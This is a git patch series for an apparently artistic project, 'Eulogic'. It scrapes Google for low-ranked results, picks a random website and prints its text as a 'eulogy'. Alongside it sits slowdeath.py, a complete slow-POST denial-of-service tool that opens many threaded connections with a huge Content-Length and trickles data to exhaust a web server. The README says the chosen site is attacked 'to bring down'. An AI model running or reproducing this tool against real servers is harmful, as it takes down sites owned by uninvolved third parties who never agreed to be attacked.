From 83430f03d921463840bdc031a460117fc71feb83 Mon Sep 17 00:00:00 2001 From: AK Date: Thu, 26 Apr 2012 15:58:05 -0400 Subject: [PATCH 1/3] added search.py and slowdeath.py --- search.py | 93 +++++++++++++++++++++++++++++++++++++++++++++++++ slowdeath.py | 97 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 190 insertions(+) create mode 100644 search.py create mode 100755 slowdeath.py diff --git a/search.py b/search.py new file mode 100644 index 0000000..cf73da4 --- /dev/null +++ b/search.py @@ -0,0 +1,93 @@ +import urllib2 +import simplejson +import re +import requests +from bs4 import BeautifulSoup +from random import choice + + + #function to use if we want to control size of string +# from bs4 import SoupStrainer +# +# only_a_tags = SoupStrainer("a") +# +# only_tags_with_id_link2 = SoupStrainer(id="link2") +# +# def is_short_string(string): +# return len(string) < 10 +# +# only_short_strings = SoupStrainer(text=is_short_string) + + + # The request also includes the userip parameter which provides the end + # user's IP address. Doing so will help distinguish this legitimate + # server-side traffic from traffic which doesn't come from an end-user. + + + +id = "hotdog" # dynamic id from site in a post request +url = ('https://ajax.googleapis.com/ajax/services/search/web' + '?v=1.0&q='+ id + '&userip=USERS-IP-ADDRESS') + +request = urllib2.Request(url, None, {'Referer': "www.google.com" }) +response = urllib2.urlopen(request) # opening url + + # Process the JSON string. +results = simplejson.load(response) +results = results["responseData"] +results = results['cursor'] +nofResults = (results["resultCount"]) + # set a variable for search result pagination +nom = long(nofResults.replace(",", ""))/ 10000 + +print "Results searched...." ,nom +results = results["moreResultsUrl"] +#print results + + #results = results['resultCount'] + + #regex to add number to results +split = re.split("start=0", results) +newurl= split[0] + "start=" + str(nom) +split[1] +print "found!!!"+ newurl + +r = requests.get(newurl) + # print r.status_code + # print r.headers['content-type'] + +r= r.text +soup = BeautifulSoup(r) +all = [] +for link in soup.find_all("a"): + all.append(link.get("href")) +listOfUrls= [] + +for s in all: #iterate through the document and extract links + if re.findall("/url?", s): + + split1 = re.split("&", s) + split2 =re.split("=", split1[0]) + deathlinks=[] + sp =(split2[1]).split("//n") + #print sp[0] + + # list of lists + listOfUrls.append(sp[0]) + + #random url selected +deathUrl = choice(listOfUrls) + #printing the selected url +print "I am chosen to die!" + deathUrl + + #open urls and parse +death= urllib2.urlopen(deathUrl) +death = death.read() + +deathSoup = BeautifulSoup(death) +print (forContext = (deathSoup.get_text())) + # a different HTML parse function using stripped string to remove white space + + # for string in deathSoup.stripped_strings: + # #context free variable from site + # tocontextfree = (string) + # print tocontextfree \ No newline at end of file diff --git a/slowdeath.py b/slowdeath.py new file mode 100755 index 0000000..696c02d --- /dev/null +++ b/slowdeath.py @@ -0,0 +1,97 @@ +#!/usr/bin/env python + +from optparse import OptionParser +from urlparse import urlparse +from time import sleep +import socket +import threading + +def openConnections(url, threads, sleepTime) : + urlParts = urlparse(url) + if (urlParts.scheme != 'http'): + raise Exception('Only the http protocol is currently supported') + + port = urlParts.port + + if port == None: port = 80 + + print "Opening %d sockets to %s:%d" % (threads, urlParts.hostname, port) + + pool = [] + + try: + for i in range(1, threads): + t = Worker(urlParts.hostname, port, urlParts.path, sleepTime) + pool.append(t) + t.start() + + print "Started %d threads. Hit ctrl-c to exit" % (threads) + + while True: sleep(1) + + except KeyboardInterrupt, e: + print "\nCaught keyboard interrupt. Stopping all threads" + + for worker in pool: worker.stop() + + for worker in pool: worker.join() + +class Worker (threading.Thread): + def __init__(self, host, port, path, sleepTime) : + self.host = host + self.port = port + self.path = path + self.sleepTime = sleepTime + self.stopped = False + threading.Thread.__init__(self) + + def stop(self): self.stopped = True + + def run(self): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.host, self.port)) + s.settimeout(1) + s.send( + 'POST ' + self.path + ' HTTP/1.1\r\n' + + 'Host: ' + self.host + '\r\n' + + 'Connection: close\r\n' + + 'Content-Length: 1000000\r\n' + + '\r\n' + ) + + while not self.stopped: + s.send('abc=123&') + sleep(self.sleepTime/1000) + + s.close + +def main(): + parser = OptionParser( + version="slowdeath v0.1", + description="Kills webservers by keeping many connections open, avoiding timeouts.", + usage="usage: %prog [options] url", + ) + parser.add_option( + '-t','--threads', + help="Number of connections to keep open (default = 100)", + type="int", + dest="threads", + default=100 + ) + parser.add_option( + '-s','--sleep', + help="Time in between packages in millisenconds (default = 1000)", + type="int", + dest="sleepTime", + default=1000 + ) + + options,args = parser.parse_args() + + if len(args) < 1: parser.error("This utility requires at least 1 argument") + + url = args[0] + + openConnections(url, options.threads, options.sleepTime) + +if __name__ == '__main__': main() \ No newline at end of file From 344a01f6c2d0f94b5227943b982050bdf7186940 Mon Sep 17 00:00:00 2001 From: AK Date: Thu, 26 Apr 2012 16:01:02 -0400 Subject: [PATCH 2/3] added readme --- README | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 README diff --git a/README b/README new file mode 100644 index 0000000..d01d767 --- /dev/null +++ b/README @@ -0,0 +1,4 @@ +Eulogic scrapes Google, returns the least relevant results, takes one at random, scrapes the text, then attacks to bring down, and delivers the site's content as eulogy. + +Alexandar Kozovski +Johann Diedrick \ No newline at end of file From c37b90ca479f0136124cb9579f0083541586d978 Mon Sep 17 00:00:00 2001 From: AK Date: Thu, 26 Apr 2012 23:46:04 -0400 Subject: [PATCH 3/3] Added error catching --- search.py | 76 ++++++++++++++++++++++++++++++++++--------------------- 1 file changed, 47 insertions(+), 29 deletions(-) diff --git a/search.py b/search.py index cf73da4..1fa2700 100644 --- a/search.py +++ b/search.py @@ -4,24 +4,23 @@ import requests from bs4 import BeautifulSoup from random import choice - +# Take a variable, search google, find the lowest results, return one random, scrape and return #function to use if we want to control size of string -# from bs4 import SoupStrainer -# -# only_a_tags = SoupStrainer("a") -# -# only_tags_with_id_link2 = SoupStrainer(id="link2") -# -# def is_short_string(string): -# return len(string) < 10 -# -# only_short_strings = SoupStrainer(text=is_short_string) + # from bs4 import SoupStrainer + # only_a_tags = SoupStrainer("a") + # + # only_tags_with_id_link2 = SoupStrainer(id="link2") + # + # def is_short_string(string): + # return len(string) < 10 + # + # only_short_strings = SoupStrainer(text=is_short_string) - # The request also includes the userip parameter which provides the end - # user's IP address. Doing so will help distinguish this legitimate - # server-side traffic from traffic which doesn't come from an end-user. + # The request also includes the userip parameter which provides the end + # user's IP address. Doing so will help distinguish this legitimate + # server-side traffic from traffic which doesn't come from an end-user. @@ -38,7 +37,11 @@ results = results['cursor'] nofResults = (results["resultCount"]) # set a variable for search result pagination -nom = long(nofResults.replace(",", ""))/ 10000 +nom = long(nofResults.replace(",", ""))/10000 +# if nom >= 100000: +# nom = nom/10000 +# elif nom < 100000: +# nom = nom/10000 print "Results searched...." ,nom results = results["moreResultsUrl"] @@ -74,20 +77,35 @@ # list of lists listOfUrls.append(sp[0]) - #random url selected -deathUrl = choice(listOfUrls) - #printing the selected url -print "I am chosen to die!" + deathUrl - - #open urls and parse -death= urllib2.urlopen(deathUrl) -death = death.read() -deathSoup = BeautifulSoup(death) -print (forContext = (deathSoup.get_text())) +def myloop(listOfUrls): + deathUrl = choice(listOfUrls) + listOfUrls.remove(deathUrl) + if len(listOfUrls) > 0: + #printing the selected url + print "Dying! " + deathUrl + # for url in deathUrl: #open urls and parse + death= urllib2.urlopen(deathUrl) + try: + death = death.read() + deathSoup = BeautifulSoup(death) + #print (deathSoup.get_text()) + for string in deathSoup.stripped_strings: + tocontextfree = repr(string) + print tocontextfree + + + + except (Exception,NameError,urllib2.HTTPError,urllib2.URLError): + # deathUrl = choice(listOfUrls) + print "I love errors" + print deathUrl + return myloop(listOfUrls) + +print 'end' + +myloop(listOfUrls) + +# print (deathSoup.get_text()) # a different HTML parse function using stripped string to remove white space - # for string in deathSoup.stripped_strings: - # #context free variable from site - # tocontextfree = (string) - # print tocontextfree \ No newline at end of file